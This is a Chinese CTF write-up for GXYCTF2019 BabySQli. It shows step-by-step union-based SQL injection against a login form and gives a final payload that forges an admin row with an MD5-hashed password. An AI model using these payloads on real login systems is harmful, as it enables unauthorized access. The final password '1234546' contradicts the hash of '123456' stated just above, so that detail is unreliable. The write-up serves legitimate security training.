当前位置:Gxlcms > 数据库问题 > [GXYCTF2019]BabySQli

[GXYCTF2019]BabySQli

时间:2021-07-01 10:21:17 帮助过:32人阅读

先随便登陆几个账号,admin的时候提示密码错误
在账号输入框里输入个单引号报错
技术图片

小字典跑一下,419的都是被过滤了
技术图片

admin‘ union select 1,2,3#
#返回pass不正确,说明有三个字段

有个靠脑洞的地方,在返回的页面源码中,有串字符串,先base32解密再base64解密,得到了这个
技术图片

‘ union select 1,‘admin‘,3#
#因为三个字段,猜测应该是id,username,password之类的
#把第二个字段换成存在的admin用户,返回pass错误
#说明第二个字段确实是用户名,那么之前的猜测应该也没有问题了

当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据
技术图片

#password字段用md5加密的确实没想到,也没找到相关的提示
‘union select 1,‘admin‘,‘e10adc3949ba59abbe56e057f20f883e‘#
#构造一个密码为123456的admin用户

payload:
username: ‘union select 1,‘admin‘,‘e10adc3949ba59abbe56e057f20f883e‘#
password:1234546

[GXYCTF2019]BabySQli

标签:pass   地方   ima   name   一个   相关   引号   解密   inf   

人气教程排行